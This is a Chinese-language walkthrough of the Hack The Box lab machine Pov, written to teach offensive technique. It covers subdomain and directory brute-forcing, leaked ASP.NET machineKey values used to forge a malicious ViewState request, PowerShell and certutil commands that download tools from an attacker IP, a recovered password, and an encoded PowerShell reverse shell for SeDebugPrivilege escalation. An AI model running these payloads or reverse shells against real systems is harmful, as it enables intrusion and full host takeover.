HTB-M-Pov

讲的是

1. 根据 web.config 中的文件泄露，构造发送这恶意 viewstate，来执行命令
2. 一个账号密码文件泄露
3. SeDebugPirvilege的提权（就是有进程迁移进入系统权限

子域名爆破

ffuf -u http://10.10.11.251 -H 'HOST: FUZZ.pov.htb' -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -mc all -ac

爆破文件

./gobuster -t 15 --delay 100ms dir -e -u "http://dev.pov.htb/portfolio" -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -x aspx

下载简历处存在任意文件读取漏洞

然后看index.aspx.cs

下载源码

web.config里面有

<configuration>

  <system.web>

    <customErrors mode="On" defaultRedirect="default.aspx" />

    <httpRuntime targetFramework="4.5" />

    <machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />

  </system.web>

    <system.webServer>

        <httpErrors>

            <remove statusCode="403" subStatusCode="-1" />

            <error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />

        </httpErrors>

        <httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />

    </system.webServer>

</configuration>

视图状态是 ASP.NET 框架默认用于在网页之间保留页面和控件值的方法。当页面 HTML 被渲染时，页面的当前状态和需要在回发期间保留的值会被序列化为 Base64 编码的字符串，并输出在视图状态隐藏字段或字段中。

利用

POST /portfolio/contact.aspx HTTP/1.1

Host: dev.pov.htb

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 3489

Origin: http://dev.pov.htb

Connection: close

Referer: http://dev.pov.htb/portfolio/contact.aspx

Upgrade-Insecure-Requests: 1



__VIEWSTATE=gsTmyv8A8BGigmDoC3iJZYHI6u01Z4s6PcO0XIkF11k7DpbwI%2FzQtApwf%2Bzc6cY%2BqcnzINTE3%2B3zB5%2Fl29ojV06oo6mrbddPlXJkpt%2B5FsdRbwKXHqQGMU%2BHudhP9wgCShBsqQqqpOr6GkYvB2JmDGHMXTwqJh1JGU0%2BX7UCSMfZGDn200ZGevZ64eEryKRRYsU8NxQ2dlafJLeJE2KcVAMqmNpYz4A93ZbLD2a5%2Fz9ghdAxwtufAmokFhXxydrb61%2F9iOrS9piBjJqjWFyfbFijED%2BPX3fpL0WHENb3Qsnsw7N%2BUb5yfwOo7zUOGSAGTo1Zbw7xSIUM72ZZt%2BrWQwjE%2B7BOlSvkjtXQMDEMo2JI4XAiZHm6Ou1Wnc2TnVZueNVZbKfJlO0u9e%2B81SQrMbZrvsTpdnvcOUL0s4fWcZ6pYU9radRX4aDdRchcoCihxHVebrZuc2BYF%2BPo7YVABGBrspoyc5ByzK%2BXxwWAstaXvIroGaMbdjd8qQsZEb%2F%2F2WoUK1FN5zqHORQFlHO1XYVj%2BUE5565kgKNT9C%2BDnzyENkpuVLO5jjW5V%2BDwac3PbXil069wQ46rlssWaPKWhJfx%2Fb7F9lG30Fc6uR2iQvApA5fEKbukpNC4L%2FoKSX2frC4rbpX6hxoa4APRFpos2%2FYQKFhyKc8xgK1wjMANNDS3y0E3e7fX%2FdRJMSoH2guBjDQPs2oKIhopsOrQsQiSYJxtjEt9NSzZy2GhV2L%2FaL57kIa7BZ%2FIFwAyir689zcSx8xuIEAwn60oOjNJUPU6mqI3BzD5QYXQ3EogaHaSgaQmjEHlFmyMdlrBLfsYlYbIrdx8p605rZMK%2BYt7FRUflFJre1GhnaI4YHRbIRdlFz9EwX5y87F9bgAprwJmDka6Zz7AUzWE64jP25p9QzbgE1yLhW%2FNYF9mj58wzUpLtD77m6EUJh5valqMQRs%2By8JFTPSbBhyLoYB94Ij0Hl1HeRdB3jZKAaXAR9%2Fs6LdKguDCuafeXQZgK2IGTRCC8IGCObAGHY1XFsXOr6yW6HpJbOKFk%2BRfOQFnFLhZiRq7NOjM8Kfaaw89d18QHkGYCxINstwy2zGju6ihLQIBe4jWKuj4nNiPD2i4dh0SgLa3xciY8EGJ22%2B6I3RBuhAbRqpV5VdOZE0aHyobgBsLhsPRI3CGBSR%2BH0LFI2six%2Bpt08pcD8yHdETKmKBYzdyUrYcxwXeNjNLV6c1iVHe%2B8qDy4ONQMg0EOwDBUpYCUgmSdEEGhzkjrjEMtZos4HEJNgnPKA75T3CyERltPNsCqnVdICUJxQ2N0z2ZKewXO8%2BcL5uXcxiHhozL82ai651xzzF%2Bop8xW5G%2BY49vbuneW1TEbheSrcefJ7OHyLRFNeNuDv7Wp98IX1sbGYRgLFH8CbOVftkFMHpEiRzL7feMWnyskfohAplrYsW8BXqbPlwO2kbFVwibGylIZFrSHJX2CQd%2BIwD6nTXPGxw77sBiNADbVC41wNaW3w3MS9ECkYUwpDAzCyk9yw8nmf3HqGBAFIGO4evCmwJonSata1zseRmYfIYlf0nxwD45g4QjEIPtAANxjMaYj3kYqKOnrO7lxd7iNtlXsdUGWnR8q0Nyp28wLloGwE9C4gTD%2FPpUAmANkIHdpwQ4S48L5jJ36CGslQmmZqR1b%2B1kCAy4BuCMmo%2FxzVpPecGocoNNk8iauJv%2BMpHnapeReR0pHGB6cdYOvHn5qPrbnXUb6A4B4dtGxmrbYfCdPnA0Es9YGVQzTg6HksPJ75xjjCDgMTXtuH%2BoEpEDy1nkoIY9ogdVctnBotOso8FAk7GTXnvMo9v0cDVyOMualmkyKGHf7yV3XQ%2BwVO2ebDoGpl%2FzQPoibQcDpleYR3jGfzJ32UurbUVnX%2BS6hgjeRsVup%2FxDxqa0Bag%2F%2B5ibkqvUoAV2q92FLnA1Nc6cexzc8wVpC0xZ%2FnFiCwkqJxH1qey5dkzysFDMtFrwryeHu72H5XGMvmxZxtObm5W6ZDSt9jxBt4nIACA7%2FBE%2FT8%2FhghVW5G7b0AP8nlSVP1TxCa%2B%2FDNTjgsSuQJx4fViJfgKj7CfQ9BX%2BwYTxNaKQbgIJ%2BJ0K8j2RVcg6kWnhkfOy%2B0MKlbL5RjG6unugAopZaeB3IBosqScxjJrA2ZeGc64rP1shtLoQM2Ma7KfWGu36fJdLHsGNMu3nVi0KNSSZx1BsH7kzmFLW8eypniJtqxjmvOQAaFT4jaU2iVCHsBnARpi0IOkYpSfGOzafmw6nU3JQCK5MQmlduW0THrCLwvwxAr0HE11GLDUQcq2OPmgmGUHYPCbrfiHO2fVMfbaWFfmcMByS2ciZOu793vwatiHZrNpf8I2ZHklmSXTjOem1KcQyIgHHvcQSUSbtG8ie7yFu%2FXEBbPs%2BmLWD2ojaCy%2BiT0%2B5QYucO3cNsMTvdAIbQCi6A2qU4SowhrPVjfoJmPJzP8h7uAep2BtZqWQeViJWnhBtaqjAIKKByN81nwjuw93iUJ525QHQ4gA7mm4ZM%2FmR1sq%2F9DnUo8tYLV%2B6zfmvPQhwd3YrwGMCGvDMSPVFVTGrTu2RdQm3KYJkbi3k%2FTXsKvrFOLGabbQWdHVbx5n97c7RqN3Uqs1pG308Xv%2FhA3WqbhwT0WyccHSwraFIQB%2FzzTIhmzBswkrEujaZTBRgTbhZBcU0iork92WFz7neMxIANDYYKo8wo9HeRo1mmp0V6hmj7WoyTMIYaj5en4V1toJITWKuE3GOXMQEP3s6aXDk08N2w2O9UIj%2FodeMIBv7Hw0eHxrCp%2FyfLJWIY9K6IxBB0M14oK%2BtDC3U2NK2kPR1ye9NkYBukEN4KPB%2BboLJuhLaBu0Dh1NqPFjBYe%2BfYkbKTJ4u6H1gRxTJh89yrqho5J9M%2BFEsD%2F4%2F2FHgfDieXjmHklHulDuJYndogsDBWhBvQGj1NV5ADDV3Dmc4U9KASNN4A%2BWacr28olyTBouJk5sCLqg4dEiVv23skTWpr%2BC4GX%2FLSzXsTiVQQe1wqR8t0S9x0BhdnRs1mshlxZbzMoJzhVmaKGrK9w1zhanVJ9WGL%2BUxgE1ZDSoPKj8nG9aE%2FA%3D%3D&__VIEWSTATEGENERATOR=37310E71&__EVENTVALIDATION=gbB3R%2BHzbHo0oq7lzLGMWXbsC%2ByQRVlnUdqW6fvswDrRNwhijxbdZKvsIti9RL89IaANlIff4TZcQQrN9JQrSi9f2VXz7xPxExhChaKfkGFF2nJDc1689BrdCTn7nR5dLu7iQQ%3D%3D&message=ttt&submit=Send+Message

传文件

IEX(New-Object Net.WebClient).downloadString('http://10.10.16.14/RunasCs.exe')


certutil -urlcache -split -f "http://10.10.16.14/psgetsys.ps1" "C:\Users\alaading\Desktop\psgetsys.ps1"


wget "http://10.10.16.14/RunasCs.exe" -outfile "RunasCs.exe"

信息收集有账号密码

PS C:\Users\sfitz\Documents> $Credential = Import-Clixml .\connection.xml
PS C:\Users\sfitz\Documents> $Credential.GetNetworkCredential().password
f8gQ8fynP44ek1m3

反弹shell

.\RunasCs.exe alaading f8gQ8fynP44ek1m3 "powershell -e J===="

或者

.\RunasCs.exe  alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.16.14:444

利用凭证

提权SeDebugPrivilege

法一

拿powershell脚本跑

https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1

中间需要一个端口转发

ImpersonateFromParentPid -ppid 552 -command "c:\windows\system32\cmd.exe" -cmdargs "/c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMQA0ACIALAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="

法二

拿msf一把梭

直接上线然后migrate

参考

• https://cal1c0.github.io/posts/HTB_Pov_writeup/
• https://0xdf.gitlab.io/2024/06/08/htb-pov.html